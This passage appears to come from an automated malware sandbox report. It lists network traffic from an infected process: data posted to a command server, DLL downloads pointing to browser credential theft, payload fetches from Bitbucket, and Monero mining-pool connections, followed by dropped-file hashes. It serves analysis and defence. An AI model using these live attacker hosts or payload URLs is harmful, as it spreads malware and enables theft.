          172.214.232.199.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          172.214.232.199.in-addr.arpa
          IN PTR
          Response
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 499
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:23:01 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJK
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 499
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:23:10 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBK
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:23:10 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          cowod.hopto.org
          BitLockerToGo.exe
          Remote address:
          8.8.8.8:53
          Request
          cowod.hopto.org
          IN A
          Response
          cowod.hopto.org
          IN A
          45.132.206.251
        • flag-ru
          POST
          http://cowod.hopto.org/
          BitLockerToGo.exe
          Remote address:
          45.132.206.251:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: cowod.hopto.org
          Content-Length: 2745
          Connection: Keep-Alive
          Cache-Control: no-cache
        • flag-us
          DNS
          251.206.132.45.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          251.206.132.45.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          xmr-eu1.nanopool.org
          explorer.exe
          Remote address:
          8.8.8.8:53
          Request
          xmr-eu1.nanopool.org
          IN A
          Response
          xmr-eu1.nanopool.org
          IN A
          51.15.65.182
          xmr-eu1.nanopool.org
          IN A
          146.59.154.106
          xmr-eu1.nanopool.org
          IN A
          54.37.137.114
          xmr-eu1.nanopool.org
          IN A
          51.15.193.130
          xmr-eu1.nanopool.org
          IN A
          51.89.23.91
          xmr-eu1.nanopool.org
          IN A
          163.172.154.142
          xmr-eu1.nanopool.org
          IN A
          212.47.253.124
          xmr-eu1.nanopool.org
          IN A
          162.19.224.121
          xmr-eu1.nanopool.org
          IN A
          141.94.23.83
          xmr-eu1.nanopool.org
          IN A
          51.15.58.224
          xmr-eu1.nanopool.org
          IN A
          54.37.232.103
        • flag-us
          DNS
          pastebin.com
          explorer.exe
          Remote address:
          8.8.8.8:53
          Request
          pastebin.com
          IN A
          Response
          pastebin.com
          IN A
          172.67.19.24
          pastebin.com
          IN A
          104.20.3.235
          pastebin.com
          IN A
          104.20.4.235
        • flag-us
          DNS
          142.154.172.163.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          142.154.172.163.in-addr.arpa
          IN PTR
          Response
          142.154.172.163.in-addr.arpa
          IN PTR
          142-154-172-163 instancesscwcloud
        • flag-us
          DNS
          24.19.67.172.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          24.19.67.172.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          xmr-eu1.nanopool.org
          explorer.exe
          Remote address:
          8.8.8.8:53
          Request
          xmr-eu1.nanopool.org
          IN A
          Response
          xmr-eu1.nanopool.org
          IN A
          163.172.154.142
          xmr-eu1.nanopool.org
          IN A
          54.37.232.103
          xmr-eu1.nanopool.org
          IN A
          162.19.224.121
          xmr-eu1.nanopool.org
          IN A
          141.94.23.83
          xmr-eu1.nanopool.org
          IN A
          146.59.154.106
          xmr-eu1.nanopool.org
          IN A
          54.37.137.114
          xmr-eu1.nanopool.org
          IN A
          51.15.193.130
          xmr-eu1.nanopool.org
          IN A
          51.15.65.182
          xmr-eu1.nanopool.org
          IN A
          51.15.58.224
          xmr-eu1.nanopool.org
          IN A
          51.89.23.91
          xmr-eu1.nanopool.org
          IN A
          212.47.253.124
        • flag-us
          DNS
          pastebin.com
          explorer.exe
          Remote address:
          8.8.8.8:53
          Request
          pastebin.com
          IN A
          Response
          pastebin.com
          IN A
          104.20.3.235
          pastebin.com
          IN A
          172.67.19.24
          pastebin.com
          IN A
          104.20.4.235
        • flag-us
          DNS
          130.193.15.51.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          130.193.15.51.in-addr.arpa
          IN PTR
          Response
          130.193.15.51.in-addr.arpa
          IN PTR
          130-193-15-51 instancesscwcloud
        • flag-us
          DNS
          235.3.20.104.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          235.3.20.104.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          91.23.89.51.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          91.23.89.51.in-addr.arpa
          IN PTR
          Response
          91.23.89.51.in-addr.arpa
          IN PTR
          vps-2ced4041vpsovhnet
        • flag-us
          DNS
          43.229.111.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          43.229.111.52.in-addr.arpa
          IN PTR
          Response
        • 104.82.234.109:443
          https://steamcommunity.com/profiles/76561199780418869
          tls, http
          BitLockerToGo.exe
          2.2kB
          42.5kB
          38
          36

          HTTP Request

          GET https://steamcommunity.com/profiles/76561199780418869

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          958 B
          2.7kB
          11
          8

          HTTP Request

          GET https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.4kB
          622 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.5kB
          2.2kB
          10
          7

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.6kB
          6.4kB
          13
          10

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.4kB
          672 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          6.0kB
          605 B
          13
          7

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/sqlp.dll
          tls, http
          BitLockerToGo.exe
          91.1kB
          2.5MB
          1836
          1825

          HTTP Request

          GET https://49.12.197.9/sqlp.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.5kB
          565 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.5kB
          565 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/freebl3.dll
          tls, http
          BitLockerToGo.exe
          24.4kB
          707.6kB
          518
          515

          HTTP Request

          GET https://49.12.197.9/freebl3.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/mozglue.dll
          tls, http
          BitLockerToGo.exe
          21.7kB
          627.8kB
          459
          456

          HTTP Request

          GET https://49.12.197.9/mozglue.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/msvcp140.dll
          tls, http
          BitLockerToGo.exe
          16.3kB
          464.7kB
          341
          338

          HTTP Request

          GET https://49.12.197.9/msvcp140.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/softokn3.dll
          tls, http
          BitLockerToGo.exe
          9.8kB
          266.6kB
          199
          196

          HTTP Request

          GET https://49.12.197.9/softokn3.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/vcruntime140.dll
          tls, http
          BitLockerToGo.exe
          3.7kB
          84.0kB
          68
          65

          HTTP Request

          GET https://49.12.197.9/vcruntime140.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/nss3.dll
          tls, http
          BitLockerToGo.exe
          71.3kB
          2.1MB
          1536
          1523

          HTTP Request

          GET https://49.12.197.9/nss3.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          2.2kB
          565 B
          10
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.5kB
          2.8kB
          10
          7

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.5kB
          2.2kB
          10
          7

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.6kB
          565 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.4kB
          768 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 185.166.142.23:443
          https://bitbucket.org/hgtbvfd11/123aqd/downloads/Updater.exe
          tls, http
          BitLockerToGo.exe
          1.6kB
          14.3kB
          19
          16

          HTTP Request

          GET https://bitbucket.org/hgtbvfd11/123aqd/downloads/NewApp.exe

          HTTP Response

          302

          HTTP Request

          GET https://bitbucket.org/hgtbvfd11/123aqd/downloads/Updater.exe

          HTTP Response

          302
        • 3.5.16.13:443
          https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383
          tls, http
          BitLockerToGo.exe
          420.2kB
          12.0MB
          8946
          8942

          HTTP Request

          GET https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/efc3f4df-566a-4e3d-a8c3-cd4708b4599f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIOEDZEQY&Signature=Kjq5tG1cimjEQTj0wkOA2GOCLPQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQCnXgyFltKi3dQpydsVQvAwlMztTPllbRgX4mMAeuidXwIgF3B23dFoYwbLjjC39KAJpIfH2Bj5a14COsVsnfjcQp4qsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEc4xoYs92b5j8nidiqEAswimLEg3%2BZ4O6g8egwzuANPjyidZc7ieOaDWbpGfQCnRP2ws3gvQqxQcqLA084F9TTH3KDgAes9iq9PRXVlp8BAwEwtylETuGENBhLvf9n6%2FRuEaOoRdNNV%2BO4Uh%2BnuRekm4CHIUFL4Mk%2BGTihNv73LT%2F%2BlxkwVgvQQRZDs2XRpxF9axVntPBLFwwfUeJWhYIcTqDIIt2NKvzY%2BmqvdFoJ6Oj%2F6Xz75gc4RDy2G3ZJ3ZeLzobFvLNge9aaSTJfXCYDXDinSkz0W6mgrMgmpr0Gq7K7SXwkNjY7Q1fHkN4TC96FhCtUyLbUAeAz365NyoXrPT9ul2qPupYhI0PZG%2Fix7pCkaMN7ug7gGOp0B8zlzvjZ%2F7zIduo96c0nV%2FQRieWQsdSehGHLrbpI1Lq0wQ7Nu087qZQjtEomi%2Fy3TO3z9CmMUq4c77tK5QTrFqOVd%2F%2BVqmyADdz%2B0qhS0FwaWXJspJLBV3EkUjgAgc5vyIEFLZsH2KAd3j5Q29LuuIftaTgaeCC9qHuzGhQDjtEcajazoBgzYZdwuS7engKURLtjhK3e%2BLHLo3YWIpQ%3D%3D&Expires=1728118374

          HTTP Response

          200

          HTTP Request

          GET https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383

          HTTP Response

          200
        • 18.238.246.206:80
          http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D
          http
          BitLockerToGo.exe
          473 B
          1.1kB
          5
          4

          HTTP Request

          GET http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.6kB
          565 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.6kB
          525 B
          8
          5

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.4kB
          518 B
          8
          5

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 45.132.206.251:80
          http://cowod.hopto.org/
          http
          BitLockerToGo.exe
          3.3kB
          132 B
          7
          3

          HTTP Request

          POST http://cowod.hopto.org/
        • 163.172.154.142:10343
          xmr-eu1.nanopool.org
          tls
          explorer.exe
          1.4kB
          2.9kB
          8
          6
        • 172.67.19.24:443
          pastebin.com
          tls
          explorer.exe
          886 B
          3.1kB
          8
          7
        • 51.15.193.130:10343
          xmr-eu1.nanopool.org
          tls
          explorer.exe
          1.4kB
          3.3kB
          9
          8
        • 104.20.3.235:443
          pastebin.com
          tls
          explorer.exe
          996 B
          4.6kB
          10
          10
        • 51.89.23.91:10343
          xmr-eu1.nanopool.org
          tls
          explorer.exe
          1.7kB
          6.5kB
          16
          15
        • 8.8.8.8:53
          209.205.72.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          209.205.72.20.in-addr.arpa

        • 8.8.8.8:53
          88.210.23.2.in-addr.arpa
          dns
          70 B
          133 B
          1
          1

          DNS Request

          88.210.23.2.in-addr.arpa

        • 8.8.8.8:53
          133.32.126.40.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          133.32.126.40.in-addr.arpa

        • 8.8.8.8:53
          95.221.229.192.in-addr.arpa
          dns
          73 B
          144 B
          1
          1

          DNS Request

          95.221.229.192.in-addr.arpa

        • 8.8.8.8:53
          228.249.119.40.in-addr.arpa
          dns
          73 B
          159 B
          1
          1

          DNS Request

          228.249.119.40.in-addr.arpa

        • 8.8.8.8:53
          steamcommunity.com
          dns
          BitLockerToGo.exe
          64 B
          80 B
          1
          1

          DNS Request

          steamcommunity.com

          DNS Response

          104.82.234.109

        • 8.8.8.8:53
          109.234.82.104.in-addr.arpa
          dns
          73 B
          139 B
          1
          1

          DNS Request

          109.234.82.104.in-addr.arpa

        • 8.8.8.8:53
          9.197.12.49.in-addr.arpa
          dns
          70 B
          125 B
          1
          1

          DNS Request

          9.197.12.49.in-addr.arpa

        • 8.8.8.8:53
          bitbucket.org
          dns
          BitLockerToGo.exe
          59 B
          107 B
          1
          1

          DNS Request

          bitbucket.org

          DNS Response

          185.166.142.23
          185.166.142.21
          185.166.142.22

        • 8.8.8.8:53
          23.142.166.185.in-addr.arpa
          dns
          73 B
          133 B
          1
          1

          DNS Request

          23.142.166.185.in-addr.arpa

        • 8.8.8.8:53
          bbuseruploads.s3.amazonaws.com
          dns
          BitLockerToGo.exe
          76 B
          254 B
          1
          1

          DNS Request

          bbuseruploads.s3.amazonaws.com

          DNS Response

          3.5.16.13
          16.182.71.105
          54.231.228.41
          52.216.37.97
          16.182.38.177
          3.5.28.154
          54.231.197.129
          52.216.51.145

        • 8.8.8.8:53
          ocsp.r2m01.amazontrust.com
          dns
          BitLockerToGo.exe
          72 B
          88 B
          1
          1

          DNS Request

          ocsp.r2m01.amazontrust.com

          DNS Response

          18.238.246.206

        • 8.8.8.8:53
          197.87.175.4.in-addr.arpa
          dns
          71 B
          157 B
          1
          1

          DNS Request

          197.87.175.4.in-addr.arpa

        • 8.8.8.8:53
          15.164.165.52.in-addr.arpa
          dns
          72 B
          146 B
          1
          1

          DNS Request

          15.164.165.52.in-addr.arpa

        • 8.8.8.8:53
          13.16.5.3.in-addr.arpa
          dns
          68 B
          110 B
          1
          1

          DNS Request

          13.16.5.3.in-addr.arpa

        • 8.8.8.8:53
          174.15.239.18.in-addr.arpa
          dns
          72 B
          129 B
          1
          1

          DNS Request

          174.15.239.18.in-addr.arpa

        • 8.8.8.8:53
          80.41.65.18.in-addr.arpa
          dns
          70 B
          124 B
          1
          1

          DNS Request

          80.41.65.18.in-addr.arpa

        • 8.8.8.8:53
          206.246.238.18.in-addr.arpa
          dns
          73 B
          131 B
          1
          1

          DNS Request

          206.246.238.18.in-addr.arpa

        • 8.8.8.8:53
          172.214.232.199.in-addr.arpa
          dns
          74 B
          128 B
          1
          1

          DNS Request

          172.214.232.199.in-addr.arpa

        • 8.8.8.8:53
          cowod.hopto.org
          dns
          BitLockerToGo.exe
          61 B
          77 B
          1
          1

          DNS Request

          cowod.hopto.org

          DNS Response

          45.132.206.251

        • 8.8.8.8:53
          251.206.132.45.in-addr.arpa
          dns
          73 B
          134 B
          1
          1

          DNS Request

          251.206.132.45.in-addr.arpa

        • 8.8.8.8:53
          xmr-eu1.nanopool.org
          dns
          explorer.exe
          66 B
          242 B
          1
          1

          DNS Request

          xmr-eu1.nanopool.org

          DNS Response

          51.15.65.182
          146.59.154.106
          54.37.137.114
          51.15.193.130
          51.89.23.91
          163.172.154.142
          212.47.253.124
          162.19.224.121
          141.94.23.83
          51.15.58.224
          54.37.232.103

        • 8.8.8.8:53
          pastebin.com
          dns
          explorer.exe
          58 B
          106 B
          1
          1

          DNS Request

          pastebin.com

          DNS Response

          172.67.19.24
          104.20.3.235
          104.20.4.235

        • 8.8.8.8:53
          142.154.172.163.in-addr.arpa
          dns
          74 B
          123 B
          1
          1

          DNS Request

          142.154.172.163.in-addr.arpa

        • 8.8.8.8:53
          24.19.67.172.in-addr.arpa
          dns
          71 B
          133 B
          1
          1

          DNS Request

          24.19.67.172.in-addr.arpa

        • 8.8.8.8:53
          xmr-eu1.nanopool.org
          dns
          explorer.exe
          66 B
          242 B
          1
          1

          DNS Request

          xmr-eu1.nanopool.org

          DNS Response

          163.172.154.142
          54.37.232.103
          162.19.224.121
          141.94.23.83
          146.59.154.106
          54.37.137.114
          51.15.193.130
          51.15.65.182
          51.15.58.224
          51.89.23.91
          212.47.253.124

        • 8.8.8.8:53
          pastebin.com
          dns
          explorer.exe
          58 B
          106 B
          1
          1

          DNS Request

          pastebin.com

          DNS Response

          104.20.3.235
          172.67.19.24
          104.20.4.235

        • 8.8.8.8:53
          130.193.15.51.in-addr.arpa
          dns
          72 B
          119 B
          1
          1

          DNS Request

          130.193.15.51.in-addr.arpa

        • 8.8.8.8:53
          235.3.20.104.in-addr.arpa
          dns
          71 B
          133 B
          1
          1

          DNS Request

          235.3.20.104.in-addr.arpa

        • 8.8.8.8:53
          91.23.89.51.in-addr.arpa
          dns
          70 B
          108 B
          1
          1

          DNS Request

          91.23.89.51.in-addr.arpa

        • 8.8.8.8:53
          43.229.111.52.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          43.229.111.52.in-addr.arpa

        MITRE ATT&CK Enterprise v15


        Downloads

        • C:\ProgramData\CGCFBFBGHD.exe

          Filesize

          5.4MB

          MD5

          925ec45b5ac88ab7af039190589204b9

          SHA1

          c71158e158d9b593be3187340c731cab5f14ad98

          SHA256

          419901e7e1747a9c413e657920429ce1d31e1b5af24e68a7dd79629066118133

          SHA512

          089ade1924ffc617670cac36e90d2c302d5b1d9e9edb1501fb0ba2c82ef530dae019b037923cdc45482998fec83fc0c5256f1fc55f22ad4b386721432cd96890

        • C:\ProgramData\HCFCAAEBGC.exe

          Filesize

          5.6MB

          MD5

          2eea3ddbfc81544b54a4ac5028a30805

          SHA1

          b57ad8495421c6bc56498d494a99b4e0cbfabdea

          SHA256

          ab043bb5ec1911f462c0e6341efb93c2760f097becc0c01ecbd02e5949b10025

          SHA512

          0b87ff6eb029675c2b6a9af0136270cb0cfcced04f53756dd35983962b46dbd79cc6ffc679ea3f84b5c6b6f25df07af886ddb3c8a770dfa31fd5b5a522cf9f79

        • C:\ProgramData\mozglue.dll

          Filesize

          593KB

          MD5

          c8fd9be83bc728cc04beffafc2907fe9

          SHA1

          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

          SHA256

          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

          SHA512

          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

        • C:\ProgramData\nss3.dll

          Filesize

          2.0MB

          MD5

          1cc453cdf74f31e4d913ff9c10acdde2

          SHA1

          6e85eae544d6e965f15fa5c39700fa7202f3aafe

          SHA256

          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

          SHA512

          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gb3a33gr.o31.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Windows\TEMP\pjjtwoljkwri.sys

          Filesize

          14KB

          MD5

          0c0195c48b6b8582fa6f6373032118da

          SHA1

          d25340ae8e92a6d29f599fef426a2bc1b5217299

          SHA256

          11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

          SHA512

          ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          4KB

          MD5

          bdb25c22d14ec917e30faf353826c5de

          SHA1

          6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

          SHA256

          e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

          SHA512

          b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          b42c70c1dbf0d1d477ec86902db9e986

          SHA1

          1d1c0a670748b3d10bee8272e5d67a4fabefd31f

          SHA256

          8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

          SHA512

          57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          2b24135c275cd88473601b97234e4c4d

          SHA1

          5aac75438f222f430ab9b95f80f22a5626c498fa

          SHA256

          f66b5a12ca819afeb838fe912093d4c3cab6287fddad1ae516052a83a35b8983

          SHA512

          274f62312c4734c8ea7ec02411a3f0e179871b76660f487a3b0a7b9934675e414ca5bc7f3bf89d133aca52b947e8e309cdc3c5fa066e47516ce55414e498ffbd

        • C:\Windows\system32\drivers\etc\hosts

          Filesize

          3KB

          MD5

          00930b40cba79465b7a38ed0449d1449

          SHA1

          4b25a89ee28b20ba162f23772ddaf017669092a5

          SHA256

          eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

          SHA512

